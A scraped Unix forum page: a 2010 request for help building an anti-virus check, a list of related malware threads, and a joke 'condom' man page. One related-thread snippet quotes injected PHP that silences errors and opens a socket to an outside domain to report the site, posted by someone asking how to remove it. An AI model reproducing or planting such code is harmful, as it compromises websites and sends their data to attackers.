Sponsored Content
Top Forums Shell Programming and Scripting Anti-malicious files and viruses Post 302441824 by x-zer0 on Tuesday 3rd of August 2010 09:25:27 AM
Old 08-03-2010
Anti-malicious files and viruses

Hello
I ask you how to make a
Anti-malicious files and viruses

Or if one of you a small example of the work on the same place and I hope my request

I want a small patch or the process of examination Virus



Image


---------- Post updated 08-03-10 at 08:25 AM ---------- Previous update was 08-02-10 at 12:26 PM ----------

can help me
 

9 More Discussions You Might Find Interesting

1. Cybersecurity

Fed up of Viruses

I am fed up of getting viruses on my computer. They come from other computers on the network and I'm fed up with them. Can anyone reccomend some virus scanning software or something that I can use to prevent my machine from getting viruses? Thanks (3 Replies)
Discussion started by: jacx2
3 Replies

2. Cybersecurity

Viruses in downloads/webs

How secure are downloads from unix.com, linux.com, etc? Not talking about off the wall individual user sites, but sites like unix.com, download.com, tucows.com? We've been inundated at work lately from viruses, and I want to make sure that for things like work related downloads, that those kind... (5 Replies)
Discussion started by: kymberm
5 Replies

3. Windows & DOS: Issues & Discussions

Viruses sneeking through MS-DOS?

I had just recently experienced, a bad experience... Apperently, a worm got into my computer a created itself in my MS-DOS. No serious damage was done, but I did a little study on it, through my computer. The virus got thought my scan, by coding itself as an HTML file. Don't know why it did that,... (2 Replies)
Discussion started by: hdk_mkr
2 Replies

4. UNIX for Dummies Questions & Answers

Why no Viruses in Unix

Can anyone explain why generally there are no viruses in Unix. Do any of the big Anti Virus supplier produce anything for Unix platforms ? (1 Reply)
Discussion started by: jimthompson
1 Replies

5. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

6. Solaris

Solaris + viruses

I know that UNIX is almost untouchable but my server is slower than previous days . I found out that some users have watched porn on net , could they compromised system security . So I have 2 questions 1. Has on market any viruses for Solaris 2. How to block some internet sites under... (1 Reply)
Discussion started by: solaris_user
1 Replies

7. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

8. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

9. Debian

Malicious perl script

Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position. Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
CONDOM(1)                                                     General Commands Manual                                                    CONDOM(1)

NAME
condom - protection against viruses and prevention of child processes SYNOPSIS
condom [options] [processid] DESCRIPTION
condom provides protection against System Transmitted Viruses (STVs) that may invade your system. Although the spread of such viruses across a network can only be abated by aware and cautious users, condom is the only highly effective means of preventing viruses from entering your system (see celibacy(1)). Any data passed to condom by the protected process will be blocked, as specified by the value of the -s option (see OPTIONS below). condom is known to defend against the following viruses and other malicious afflictions: o AIDS o Herpes Simplex (genital varieties) o Syphilis o Crabs o Genital warts o Gonhorrea o Chlamydia o Michelangelo o Jerusalem When used alone or in conjunction with pill(1), sponge(1), foam(1), and/or setiud(3), condom also prevents the conception of a child process. If invoked from within a synchronous process, condom has, by default, an 80% chance of preventing the external processes from becoming parent processes (see the -s option below). When other process contraceptives are used, the chance of preventing a child process from being forked becomes much greater. See pill(1), sponge(1), foam(1), and setiud(3) for more information. If no options are given, the current user's login process (as determined by the environment variable USER) is protected with a Trojan rough-cut latex condom without a reservoir tip. The optional ``processid'' argument is an integer specifying the process to protect. NOTE: condom may only be used with a hard disk. condom will terminate abnormally with exit code -1 if used with a floppy disk (see DIAG- NOSTICS below). OPTIONS
The following options may be given to condom: -b brand brands are as follows: trojan (default) ramses sheik goldcoin fourex -m material The valid materials are: latex (default) saranwrap membrane WARNING! The membrane option is not endorsed by the System Administrator General as an effective barrier against certain viruses. It is supported only for the sake of tradition. -f flavor The following flavors are currently supported: plain (default) apple banana cherry cinnamon licorice orange peppermint raspberry spearmint strawberry -r Toggle reservoir tip (default is no reservoir tip) -s strength strength is an integer between 20 and 100 specifying the resilience of condom against data passed to condom by the protected process. Using a larger value of strength increases condom's protective abilities, but also reduces interprocess communication. A smaller value of strength increases interprocess communication, but also increases the likelihood of a security breach. An extremely vigorous process or one passing an enormous amount of data to condom will increase the chance of condom's failure. The default strength is 80%. -t texture Valid textures are: rough (default) ribbed bumps lubricated (provides smoother interaction between processes) WARNING: The use of an external application to condom in order to reduce friction between processes has been proven in benchmark tests to decrease condom's strength factor! If execution speed is important to your process, use the ``-t lubricated'' option. DIAGNOSTICS
condom terminates with one of the following exit codes: -1 An attempt was made to use condom on a floppy disk. 0 condom exited successfully (no data was passed to the synchronous process). 1 condom failed and data was allowed through. The danger of transmission of an STV or the forking of a child process is inversely proportional to the number of other protections employed and is directly proportional to the ages of the processes involved. BUGS
condom is NOT 100% effective at preventing a child process from being forked or at deterring the invasion of a virus (although the System Administrator General has deemed that condom is the most effective means of preventing the spread of system transmitted viruses). See celibacy(1) for information on a 100% effective program for preventing these problems. Remember, the use of sex(1) and other related routines should only occur between mature, consenting processes. If you must use sex(1), please employ condom to protect your process and your synchronous process. If we are all responsible, we can stop the spread of STVs. AUTHORS and HISTORY The original version of condom was released in Roman times and was only marginally effective. With the advent of modern technology, condom now supports many more options and is much more effective. The current release of condom was written by Ken Maupin at the University of Washington (maupin@cs.washington.edu) and was last updated on 10/7/92. SEE ALSO
celibacy(1), sex(1), pill(1), sponge(1), foam(1), and setiud(3) EUNUCH Programmer's Manual CONDOM(1)
All times are GMT -4. The time now is 08:30 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy